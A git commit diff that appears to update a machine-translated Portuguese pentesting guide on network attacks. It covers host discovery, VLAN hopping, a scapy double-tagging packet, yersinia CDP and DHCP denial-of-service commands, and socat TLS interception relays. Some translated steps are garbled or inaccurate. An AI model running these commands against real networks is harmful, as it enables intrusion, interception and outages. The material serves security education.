Translated ['generic-methodologies-and-resources/pentesting-network/READ

This commit is contained in:
Translator 2023-11-05 15:21:06 +00:00
parent 46cec6fd70
commit 293d0654ea

View file

@ -30,7 +30,7 @@ Você também pode usar o **nmap** para enviar outros tipos de pacotes ICMP (iss
```bash ```bash
ping -c 1 199.66.11.4 # 1 echo request to a host ping -c 1 199.66.11.4 # 1 echo request to a host
fping -g 199.66.11.0/24 # Send echo requests to ranges fping -g 199.66.11.0/24 # Send echo requests to ranges
nmap -PEPM -sP -n 199.66.11.0/24 #Send echo, timestamp requests and subnet mask requests nmap -PE -PM -PP -sn -n 199.66.11.0/24 #Send echo, timestamp requests and subnet mask requests
``` ```
### Descoberta de Portas TCP ### Descoberta de Portas TCP
@ -116,7 +116,7 @@ Mas, como você está na **mesma rede** que os outros hosts, você pode fazer **
* Se você **pingar** um **endereço de broadcast de sub-rede**, o ping deve chegar a **cada host** e eles podem **responder** a **você**: `ping -b 10.10.5.255` * Se você **pingar** um **endereço de broadcast de sub-rede**, o ping deve chegar a **cada host** e eles podem **responder** a **você**: `ping -b 10.10.5.255`
* Ao pingar o **endereço de broadcast da rede**, você pode até encontrar hosts em **outras sub-redes**: `ping -b 255.255.255.255` * Ao pingar o **endereço de broadcast da rede**, você pode até encontrar hosts em **outras sub-redes**: `ping -b 255.255.255.255`
* Use a opção `-PEPM` do `nmap` para realizar a descoberta de hosts enviando solicitações de **echo ICMPv4**, **timestamp** e **máscara de sub-rede**: `nmap -PEPM -sP vvv -n 10.12.5.0/24` * Use as opções `-PE`, `-PP`, `-PM` do `nmap` para realizar a descoberta de hosts enviando respectivamente **solicitações de eco ICMPv4**, **timestamp** e **máscara de sub-rede**: `nmap -PE -PM -PP -sn -vvv -n 10.12.5.0/24`
### **Wake On Lan** ### **Wake On Lan**
@ -170,7 +170,7 @@ nmap -sU -sV --version-intensity 0 -n -T4 <IP>
``` ```
### Varredura SCTP ### Varredura SCTP
O SCTP funciona ao lado do TCP e UDP. Destinado a fornecer o transporte de dados de telefonia sobre IP, o protocolo duplica muitos dos recursos de confiabilidade do Sistema de Sinalização 7 (SS7) e sustenta uma família de protocolos maior conhecida como SIGTRAN. O SCTP é suportado por sistemas operacionais, incluindo IBM AIX, Oracle Solaris, HP-UX, Linux, Cisco IOS e VxWorks. O SCTP funciona ao lado do TCP e UDP. Destinado a fornecer **transporte** de dados de **telefonia** sobre **IP**, o protocolo duplica muitos dos recursos de confiabilidade do Sistema de Sinalização 7 (SS7) e sustenta uma família de protocolos maior conhecida como SIGTRAN. O SCTP é suportado por sistemas operacionais, incluindo IBM AIX, Oracle Solaris, HP-UX, Linux, Cisco IOS e VxWorks.
O nmap oferece duas varreduras diferentes para SCTP: _-sY_ e _-sZ_ O nmap oferece duas varreduras diferentes para SCTP: _-sY_ e _-sZ_
```bash ```bash
@ -203,7 +203,7 @@ IP 10.10.0.2 > 185.22.224.18: ICMP echo reply, id 25804, seq 1586, length 64
``` ```
## Sniffing ## Sniffing
Sniffing permite aprender detalhes de intervalos de IP, tamanhos de sub-rede, endereços MAC e nomes de host revisando quadros e pacotes capturados. Se a rede estiver mal configurada ou o tecido de comutação estiver sob estresse, os atacantes podem capturar material sensível por meio de sniffing passivo de rede. Sniffing permite que você obtenha detalhes sobre faixas de IP, tamanhos de sub-rede, endereços MAC e nomes de host ao revisar quadros e pacotes capturados. Se a rede estiver mal configurada ou o tecido de comutação estiver sob estresse, os invasores podem capturar informações sensíveis por meio do sniffing passivo de rede.
Se uma rede Ethernet comutada estiver configurada corretamente, você verá apenas quadros de transmissão e material destinado ao seu endereço MAC. Se uma rede Ethernet comutada estiver configurada corretamente, você verá apenas quadros de transmissão e material destinado ao seu endereço MAC.
@ -315,7 +315,7 @@ Ao analisar os quadros STP, **descobrimos a existência das VLANs 30 e 60**.
#### Atacando VLANs específicas #### Atacando VLANs específicas
Uma vez que você conhece os IDs das VLANs e os valores dos IPs, você pode **configurar uma interface virtual para atacar uma VLAN específica**.\ Uma vez que você conhece os IDs das VLANs e os valores dos IPs, você pode **configurar uma interface virtual para atacar uma VLAN específica**.\
Se o DHCP não estiver disponível, então use o _ifconfig_ para configurar um endereço IP estático. Se o DHCP não estiver disponível, então use _ifconfig_ para configurar um endereço IP estático.
``` ```
root@kali:~# modprobe 8021q root@kali:~# modprobe 8021q
root@kali:~# vconfig add eth1 250 root@kali:~# vconfig add eth1 250
@ -354,7 +354,7 @@ O ataque discutido de **Dynamic Trunking e criação de interfaces virtuais e de
#### Dupla Marcação #### Dupla Marcação
Se um atacante conhece o valor do **MAC, IP e ID da VLAN do host da vítima**, ele pode tentar **marcar duplamente um quadro** com a VLAN designada e a VLAN da vítima e enviar um pacote. Como a **vítima não poderá se conectar de volta** ao atacante, a **melhor opção para o atacante é se comunicar via UDP** com protocolos que possam realizar algumas ações interessantes (como SNMP). Se um atacante conhece o valor do **MAC, IP e ID da VLAN do host da vítima**, ele pode tentar **marcar duplamente um quadro** com a VLAN designada e a VLAN da vítima e enviar um pacote. Como a **vítima não poderá se conectar de volta** ao atacante, a melhor opção para o atacante é se comunicar via UDP para protocolos que possam realizar algumas ações interessantes (como SNMP).
Outra opção para o atacante é lançar uma **varredura de porta TCP falsificando um IP controlado pelo atacante e acessível pela vítima** (provavelmente através da internet). Em seguida, o atacante pode capturar no segundo host de sua propriedade se ele recebe alguns pacotes da vítima. Outra opção para o atacante é lançar uma **varredura de porta TCP falsificando um IP controlado pelo atacante e acessível pela vítima** (provavelmente através da internet). Em seguida, o atacante pode capturar no segundo host de sua propriedade se ele recebe alguns pacotes da vítima.
@ -367,7 +367,7 @@ from scapy.all import *
packet = Ether()/Dot1Q(vlan=1)/Dot1Q(vlan=20)/IP(dst='192.168.1.10')/ICMP() packet = Ether()/Dot1Q(vlan=1)/Dot1Q(vlan=20)/IP(dst='192.168.1.10')/ICMP()
sendp(packet) sendp(packet)
``` ```
#### Bypass de Segmentação de VLAN Lateral <a href="#d679" id="d679"></a> #### Bypass de Segmentação Lateral de VLAN <a href="#d679" id="d679"></a>
Se você tiver **acesso a um switch ao qual está conectado diretamente**, você tem a capacidade de **burlar a segmentação de VLAN** dentro da rede. Simplesmente **altere a porta para o modo trunk** (também conhecido como trunk), crie interfaces virtuais com os IDs das VLANs de destino e configure um endereço IP. Você pode tentar solicitar o endereço dinamicamente (DHCP) ou pode configurá-lo estaticamente. Isso depende do caso. Se você tiver **acesso a um switch ao qual está conectado diretamente**, você tem a capacidade de **burlar a segmentação de VLAN** dentro da rede. Simplesmente **altere a porta para o modo trunk** (também conhecido como trunk), crie interfaces virtuais com os IDs das VLANs de destino e configure um endereço IP. Você pode tentar solicitar o endereço dinamicamente (DHCP) ou pode configurá-lo estaticamente. Isso depende do caso.
@ -451,7 +451,7 @@ O Protocolo de Descoberta CISCO (CDP) é o protocolo usado pelos dispositivos CI
#### Ataque de Sobrecarga CDP <a href="#0d6a" id="0d6a"></a> #### Ataque de Sobrecarga CDP <a href="#0d6a" id="0d6a"></a>
Você pode realizar um ataque de DoS a um switch CISCO esgotando a memória do dispositivo simulando dispositivos CISCO reais. Você pode realizar um ataque de negação de serviço (DoS) em um switch CISCO esgotando a memória do dispositivo simulando dispositivos CISCO reais.
```bash ```bash
sudo yersinia cdp -attack 1 #DoS Attack simulating new CISCO devices sudo yersinia cdp -attack 1 #DoS Attack simulating new CISCO devices
# Or you could use the GUI # Or you could use the GUI
@ -504,7 +504,7 @@ Nmap done: 0 IP addresses (0 hosts up) scanned in 5.27 seconds
``` ```
**DoS** **DoS**
Existem dois tipos de DoS que podem ser realizados contra servidores DHCP. O primeiro consiste em **simular hosts falsos suficientes para usar todos os possíveis endereços IP**.\ Existem dois tipos de DoS que podem ser realizados contra servidores DHCP. O primeiro consiste em **simular hosts falsos suficientes para usar todos os possíveis endereços IP**.
Este ataque só funcionará se você puder ver as respostas do servidor DHCP e completar o protocolo (**Discover** (Comp) --> **Offer** (servidor) --> **Request** (Comp) --> **ACK** (servidor)). Por exemplo, isso **não é possível em redes Wi-Fi**. Este ataque só funcionará se você puder ver as respostas do servidor DHCP e completar o protocolo (**Discover** (Comp) --> **Offer** (servidor) --> **Request** (Comp) --> **ACK** (servidor)). Por exemplo, isso **não é possível em redes Wi-Fi**.
Outra maneira de realizar um DoS DHCP é enviar um **pacote DHCP-RELEASE usando como código de origem todos os IPs possíveis**. Em seguida, o servidor pensará que todos terminaram de usar o IP. Outra maneira de realizar um DoS DHCP é enviar um **pacote DHCP-RELEASE usando como código de origem todos os IPs possíveis**. Em seguida, o servidor pensará que todos terminaram de usar o IP.
@ -641,14 +641,14 @@ O dnsmasq é uma ferramenta útil para configurar um servidor DNS local em seu a
``` ```
Isso direcionará as consultas DNS para o servidor DNS local configurado pelo dnsmasq. Isso direcionará as consultas DNS para o servidor DNS local configurado pelo dnsmasq.
Agora você configurou com sucesso seu próprio servidor DNS local usando o dnsmasq. Você pode testar a resolução de nomes de domínio usando o comando `nslookup` ou navegando para o domínio personalizado em um navegador da web. Certifique-se de que o dnsmasq esteja em execução e funcionando corretamente antes de prosseguir com seus testes de penetração. Agora você configurou com sucesso seu próprio servidor DNS local usando o dnsmasq. Você pode testar a resolução de nomes de domínio usando o comando `nslookup` ou navegando para o domínio no navegador. Certifique-se de que o dnsmasq esteja em execução e funcionando corretamente antes de prosseguir com seus testes de penetração.
```bash ```bash
apt-get install dnsmasqecho "addn-hosts=dnsmasq.hosts" > dnsmasq.conf #Create dnsmasq.confecho "127.0.0.1 domain.example.com" > dnsmasq.hosts #Domains in dnsmasq.hosts will be the domains resolved by the Dsudo dnsmasq -C dnsmasq.conf --no-daemon apt-get install dnsmasqecho "addn-hosts=dnsmasq.hosts" > dnsmasq.conf #Create dnsmasq.confecho "127.0.0.1 domain.example.com" > dnsmasq.hosts #Domains in dnsmasq.hosts will be the domains resolved by the Dsudo dnsmasq -C dnsmasq.conf --no-daemon
dig @localhost domain.example.com # Test the configured DNS dig @localhost domain.example.com # Test the configured DNS
``` ```
### Gateways Locais ### Gateways Locais
Frequentemente, existem várias rotas para sistemas e redes. Ao criar uma lista de endereços MAC na rede local, use o _gateway-finder.py_ para identificar hosts que suportam o encaminhamento IPv4. Frequentemente, existem várias rotas para sistemas e redes. Ao criar uma lista de endereços MAC na rede local, utilize o _gateway-finder.py_ para identificar hosts que suportam o encaminhamento IPv4.
``` ```
root@kali:~# git clone https://github.com/pentestmonkey/gateway-finder.git root@kali:~# git clone https://github.com/pentestmonkey/gateway-finder.git
root@kali:~# cd gateway-finder/ root@kali:~# cd gateway-finder/
@ -764,24 +764,27 @@ cat $FILENAME.key $FILENAME.crt >$FILENAME.pem
Para realizar uma escuta usando um certificado, siga os passos abaixo: Para realizar uma escuta usando um certificado, siga os passos abaixo:
1. Obtenha um certificado válido que corresponda ao alvo que você deseja escutar. 1. Obtenha um certificado válido que corresponda ao alvo que você deseja escutar.
2. Configure o ambiente de escuta para usar o certificado obtido. 2. Configure o ambiente para usar o certificado. Isso pode envolver a instalação do certificado no sistema operacional ou a configuração de um servidor web para usar o certificado.
3. Inicie a escuta usando o certificado. 3. Inicie a escuta usando o certificado. Isso pode ser feito usando ferramentas como o Wireshark ou tcpdump, especificando o certificado como parte do processo de escuta.
4. Analise os dados capturados para obter informações relevantes.
Ao usar um certificado válido, você pode realizar uma escuta de forma segura e autenticada, garantindo a confidencialidade e integridade das informações obtidas. Certifique-se de seguir as práticas recomendadas e as políticas de segurança ao realizar essa atividade. Lembre-se de que a escuta usando um certificado pode ser uma atividade sensível e pode ser ilegal se não for realizada com permissão adequada. Sempre obtenha autorização antes de realizar qualquer atividade de escuta.
``` ```
sudo socat -v -v openssl-listen:443,reuseaddr,fork,cert=$FILENAME.pem,cafile=$FILENAME.crt,verify=0 - sudo socat -v -v openssl-listen:443,reuseaddr,fork,cert=$FILENAME.pem,cafile=$FILENAME.crt,verify=0 -
``` ```
#### Ouvir usando certificado e redirecionar para os hosts #### Ouvir usando certificado e redirecionar para os hosts
Para realizar um teste de penetração em uma rede, é possível usar um certificado para ouvir o tráfego de rede e redirecioná-lo para os hosts desejados. Isso permite que você analise o tráfego em tempo real e identifique possíveis vulnerabilidades ou atividades suspeitas. Para realizar um teste de penetração em uma rede, é possível usar um certificado para ouvir o tráfego de rede e redirecioná-lo para os hosts desejados. Isso pode ser útil para analisar o tráfego em tempo real e identificar possíveis vulnerabilidades ou atividades suspeitas.
Para começar, você precisará gerar um certificado válido para o domínio que deseja ouvir. Isso pode ser feito usando ferramentas como o OpenSSL. Certifique-se de que o certificado seja confiável e válido para evitar problemas de segurança. Para implementar essa técnica, siga as etapas abaixo:
Depois de ter o certificado, você pode configurar um servidor proxy reverso para ouvir o tráfego de rede. Isso pode ser feito usando ferramentas como o Nginx ou o Apache. Certifique-se de configurar corretamente o servidor proxy reverso para usar o certificado gerado anteriormente. 1. Gere um certificado SSL válido para o domínio que você deseja ouvir.
2. Configure um servidor proxy reverso para redirecionar o tráfego para os hosts desejados.
3. Instale o certificado SSL no servidor proxy reverso.
4. Configure o servidor proxy reverso para ouvir o tráfego de rede usando o certificado SSL.
5. Redirecione o tráfego para os hosts desejados.
Uma vez que o servidor proxy reverso esteja configurado, você pode redirecionar o tráfego de rede para os hosts desejados. Isso pode ser feito usando regras de redirecionamento no servidor proxy reverso. Certifique-se de configurar as regras corretamente para redirecionar o tráfego para os hosts específicos que você deseja analisar. Ao implementar essa técnica, você poderá interceptar o tráfego de rede e analisá-lo para identificar possíveis vulnerabilidades ou atividades maliciosas. Lembre-se de que é importante obter permissão adequada antes de realizar qualquer teste de penetração em uma rede.
Ao ouvir o tráfego de rede usando um certificado e redirecioná-lo para os hosts desejados, você poderá analisar o tráfego em tempo real e identificar possíveis vulnerabilidades ou atividades suspeitas. Isso pode ser útil durante um teste de penetração para identificar pontos fracos na segurança da rede.
``` ```
sudo socat -v -v openssl-listen:443,reuseaddr,fork,cert=$FILENAME.pem,cafile=$FILENAME.crt,verify=0 openssl-connect:[SERVER]:[PORT],verify=0 sudo socat -v -v openssl-listen:443,reuseaddr,fork,cert=$FILENAME.pem,cafile=$FILENAME.crt,verify=0 openssl-connect:[SERVER]:[PORT],verify=0
``` ```